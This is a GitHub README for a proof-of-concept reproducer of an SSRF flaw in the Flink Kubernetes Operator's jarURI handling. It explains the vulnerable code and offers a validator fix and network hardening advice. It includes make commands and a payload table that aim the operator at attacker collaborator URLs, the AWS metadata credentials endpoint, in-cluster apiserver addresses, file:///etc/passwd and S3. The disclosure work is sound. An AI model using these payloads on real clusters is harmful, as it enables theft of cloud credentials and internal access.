oscerd/CVE-2026-40564
GitHub: oscerd/CVE-2026-40564
Stars: 0 | Forks: 0
# CVE-2026-40564: SSRF via FlinkSessionJob.spec.job.jarURI in flink-kubernetes-operator
The Apache Flink Kubernetes Operator does not check the `spec.job.jarURI` field on `FlinkSessionJob` (or `FlinkDeployment`) resources. Anyone who can create one of those resources can set `jarURI` to any URL. When the operator reconciles the resource, it fetches that URL from inside its own pod. The scheme can be http, https, file, or any of the filesystem plugins Flink ships with, so the request can go almost anywhere the operator pod can reach.
* CVE: CVE-2026-40564
* Affected: flink-kubernetes-operator 1.14.0, and `main` (1.15-SNAPSHOT as of 2026-04-09)
* Reported to `security@apache.org` and `private@flink.apache.org` on 2026-04-09
* Call chain: `SessionJobReconciler.deploy` -> `submitJobToSessionCluster` -> `uploadJar` -> `ArtifactManager.fetch` -> `HttpArtifactFetcher.fetch`
## Running it
make verify
This runs five steps in order:
1. create a local kind cluster
2. install the operator (1.14.0) with Helm
3. start a Flink session cluster and wait for its JobManager to come up
4. ask webhook.site for a fresh URL, then apply a `FlinkSessionJob` whose `jarURI` points at it
5. poll webhook.site and print the requests it received
When it works, the end of the run looks like this:
==> [5/5] verify-ssrf
target jarURI: https://webhook.site//exploit.jar
target is webhook.site, confirming via its REST API...
=== webhook.site captured requests (newest first) ===
2026-05-28 17:35:29 GET https://webhook.site//exploit.jar
User-Agent: Java/17.0.17
Source IP: 82.51.158.62
CVE-2026-40564 CONFIRMED: the operator pod issued an HTTP GET against the attacker URL.
Dashboard: https://webhook.site/#!/view/
The first run takes about 6 to 8 minutes. Most of that is pulling the `flink:1.17` image, which is around 700 MB. Later runs are closer to 3 minutes.
### What you need
`docker`, `kind`, `kubectl` 1.23 or newer, `helm` 3, `make`, `curl`, and `jq`. The cluster has to reach the internet so it can talk to webhook.site.
### Pointing it at a different URL
By default the Makefile grabs a fresh webhook.site URL for you. To send the request somewhere else, set `SSRF_URL` to the full `jarURI` you want. It is used as written.
# reuse a specific webhook.site URL
make verify SSRF_URL=https://webhook.site/8a2f1e3c-aaaa-bbbb-cccc-dddddddddddd/exploit.jar
# your own collaborator (Burp, interactsh, a netcat listener, and so on)
make verify SSRF_URL=https://abc123.oast.fun/exploit.jar
# the AWS instance metadata service
make verify SSRF_URL=http://169.254.169.254/latest/meta-data/iam/security-credentials/
# a non-http scheme handled by Flink's filesystem layer
make verify SSRF_URL=file:///etc/passwd
### Cleaning up
make cleanup
This removes the kind cluster. Nothing is left behind.
## Why it happens
Three classes are involved, and none of them looks at the scheme, host, or IP in `jarURI`.
private Optional validateJobSpec(
JobSpec job, @Nullable TaskManagerSpec tm, Map confMap) {
if (job == null) return Optional.empty();
Configuration configuration = Configuration.fromMap(confMap);
// ... parallelism / upgradeMode / savepoint / resource checks ...
// job.getJarURI() is never inspected.
return Optional.empty();
}
`ArtifactManager.fetch` picks a fetcher from the scheme. There is no allowlist, and anything that is not http or https drops through to Flink's filesystem layer:
public File fetch(String jarURI, Configuration flinkConfiguration, String targetDirStr) throws Exception {
URI uri = new URI(jarURI);
if ("http".equals(uri.getScheme()) || "https".equals(uri.getScheme())) {
return HttpArtifactFetcher.INSTANCE.fetch(jarURI, flinkConfiguration, targetDir);
} else {
return FileSystemBasedArtifactFetcher.INSTANCE.fetch(jarURI, flinkConfiguration, targetDir);
}
}
`HttpArtifactFetcher.fetch` opens the URL as given. There is no host check, no IP range check, and nothing that stops it from hitting loopback or link-local addresses:
public File fetch(String uri, Configuration flinkConfiguration, File targetDir) throws Exception {
URL url = new URL(uri);
HttpURLConnection conn = (HttpURLConnection) url.openConnection();
conn.setRequestMethod("GET");
File targetFile = new File(targetDir, FilenameUtils.getName(url.getPath()));
try (var inputStream = conn.getInputStream()) {
FileUtils.copyToFile(inputStream, targetFile);
}
return targetFile;
}
## What an attacker gets
The operator usually runs with wide RBAC. The official Helm chart grants `*` on several resource types, secrets included, and the pod can normally reach the network without restriction. If you can make it send requests for you, you can:
* read cloud metadata services (AWS, GCE, Azure) and pull the IAM credentials tied to the operator's node
* reach services inside the cluster that only listen on the internal network, or that trust the operator's source IP
* scan internal ports blind, reading the result back from the error message in `FlinkSessionJob` status
* use file, s3, hdfs, gs, or any other Flink filesystem scheme to read local files or talk to storage the operator can reach but you cannot
On a shared cluster where several teams use the same operator, any of them can use it to reach another team's resources.
### Other URLs that work
The reproducer defaults to webhook.site, but the bug does not care what the URL is. Set `SSRF_URL`, or edit `manifests/vulnerable-sessionjob.yaml`, to any of these:
| `jarURI` | Reaches |
|---|---|
| `http://169.254.169.254/latest/meta-data/iam/security-credentials/` | AWS IMDSv1, the IAM credentials of the operator pod's node |
| `http://10.0.0.1:6443/api` | An in-cluster apiserver, or any internal endpoint that allowlists the operator's IP |
| `file:///etc/passwd` | The operator pod's own filesystem, through the filesystem fetcher branch |
| `s3://attacker-bucket/x.jar` | S3, using the operator pod's credentials |
## Fixing it
Add a check to `DefaultValidator.validateJobSpec`:
if (job.getJarURI() != null) {
Optional uriError = validateJarURI(job.getJarURI(), configuration);
if (uriError.isPresent()) return uriError;
}
private Optional validateJarURI(String jarURI, Configuration conf) {
URI uri;
try {
uri = new URI(jarURI);
} catch (URISyntaxException e) {
return Optional.of("jarURI is not a valid URI: " + e.getMessage());
}
String scheme = uri.getScheme();
if (scheme == null) return Optional.of("jarURI must include a scheme");
Set allowed = conf.get(KubernetesOperatorConfigOptions.JAR_URI_ALLOWED_SCHEMES);
if (!allowed.contains(scheme.toLowerCase(Locale.ROOT))) {
return Optional.of("jarURI scheme '" + scheme + "' is not in the allowlist");
}
if ("http".equalsIgnoreCase(scheme) || "https".equalsIgnoreCase(scheme)) {
InetAddress addr;
try {
addr = InetAddress.getByName(uri.getHost());
} catch (UnknownHostException e) {
return Optional.of("jarURI host cannot be resolved");
}
if (addr.isLoopbackAddress() || addr.isLinkLocalAddress()
|| addr.isSiteLocalAddress() || addr.isAnyLocalAddress()) {
return Optional.of("jarURI host points to a restricted address");
}
}
return Optional.empty();
}
Give `KubernetesOperatorConfigOptions.JAR_URI_ALLOWED_SCHEMES` a default of `Set.of("https")`. Operators who need s3 or another scheme can add it.
Two more things worth doing:
* Add a `NetworkPolicy` for the operator pod that blocks egress to link-local (`169.254.0.0/16`), loopback, and the known cloud metadata addresses.
* On AWS, turn on IMDSv2. Then even a working SSRF cannot read the metadata service without a session token, and the operator has no reason to send one.
## Notes
The Makefile works around two things that break kind on Linux. Each check only runs when the problem is actually present, so it is safe to run again.
1. CoreDNS forwarding to loopback. With systemd-resolved, the kind node's `/etc/resolv.conf` points at `127.0.0.1`, so the cluster resolves outside names to localhost. The `cluster-up` step rewrites the CoreDNS config to forward to `1.1.1.1` and `8.8.8.8`.
2. The operator pod inheriting the host's DNS search domains. With `ndots` set to 5, a name like `webhook.site` gets the host search domains added first, and some ISPs answer `127.0.0.1` for subdomains they do not recognize. The `install-operator` step gives the operator pod its own `dnsConfig` so this does not happen.